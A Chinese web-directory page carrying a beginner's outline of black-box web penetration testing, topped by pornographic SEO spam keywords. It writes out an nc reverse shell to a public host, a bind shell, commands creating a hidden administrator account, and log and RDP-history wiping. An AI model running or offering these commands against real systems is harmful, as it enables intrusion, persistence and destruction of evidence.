日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網站的源碼等信息的情況下對其滲透,相當于代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權,內網滲透,留后門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然后注入得到后臺管理員賬號密碼,登錄后臺,上傳小馬,再通過小馬上傳大馬,提權,內網轉發,進行內網滲透,掃描內網c段存活主機及開放端口,看其主機有無可利用漏洞(nessus)端口(nmap)對應服務及可能存在的漏洞,對其利用(msf)拿下內網,留下后門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到數據庫并可執行cmd命令,可繼續上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術可以不高,思路一定得騷。

信息收集

信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。

DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網站負責人及其信息(whois查詢)

整站信息:服務器操作系統、服務器類型及版本(Apache/Nginx/Tomcat/IIS)、數據庫類型(MySQL/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;

網站常見搭配為:

ASP和ASPX:ACCESS、SQLServer

PHP:MySQL、PostgreSQL

JSP:Oracle、MySQL

敏感目錄信息(御劍,dirbust)

開放端口信息(nmp)

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描,看其是否有可利用漏洞。

常見漏洞:

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實體注入)漏洞

SSRF(服務端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠程代碼執行漏洞

CORS跨域資源共享漏洞

越權訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什么也好對相應漏洞進行利用

如:

Sql注入(sqlmap)

XSS(BEEF)

后臺密碼爆破(burp)

端口爆破(hydra)

提權

獲得shell之后我們權限可能很低,因此要對自己提權,可以根據服務器版本對應的exp進行提權,對于windows系統也可看其補丁對應漏洞的exp進行提權

內網滲透

首先進行端口轉發可用nc

nc使用方法:

反向連接

在公網主機上進行監聽:

nc-lvp 4444

在內網主機上執行:

nc-e cmd.exe 公網主機ip4444

成功之后即可得到一個內網主機shell

正向連接

遠程主機上執行:

nc-l -p 4444 -t -e cmd.exe

本地主機上執行:

nc-vv 遠程主機ip4444

成功后,本地主機即可遠程主機的一個shell

然后就是對內網進行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進行掃描看是否有可用漏洞,可用msf進行利用,或者用nmap掃描存活主機及開放端口,可用hydra進行端口爆破或者用msf對端口對應漏洞得到shell拿下內網留后門

留后門

對于網站上傳一句話木馬,留下后門

對于windows用戶可用hideadmin創建一個超級隱藏賬戶

手工:

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現控制版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。

痕跡清理

日志清理:在win環境下的話用msf清理,命令如下:

runclearlogs

clearev

如果在Liunx環境下:

rm-f -r /var/log刪除/var/log下的文件

exportHISTSIZE=0export HISTSIZE=0刪除bashshell保存的最后500條命令

3389遠程登陸記錄清除:

@echooff

@regdelete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal

ServerClientDefault" /va /f

@del"%USERPROFILE%My DocumentsDefault.rdp" /a

@exit

另外在滲透時盡量用代理以免輕易的暴露自己ip。

本人呢,也是個剛入安全圈的菜雞,以上是在學習中對滲透過程的一點總結,大牛勿噴,希望可以幫到那些剛剛入門的信息安全愛好者。

相關練習

滲透綜合場景演練利用自己學習到的知識對目標進行滲透測試,獲取目標系統的權限,從而獲取敏感信息,那么恭喜你,你已經完成了從安全小白到滲透測試工程師的蛻變。

分享到:
標簽:滲透 Web
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定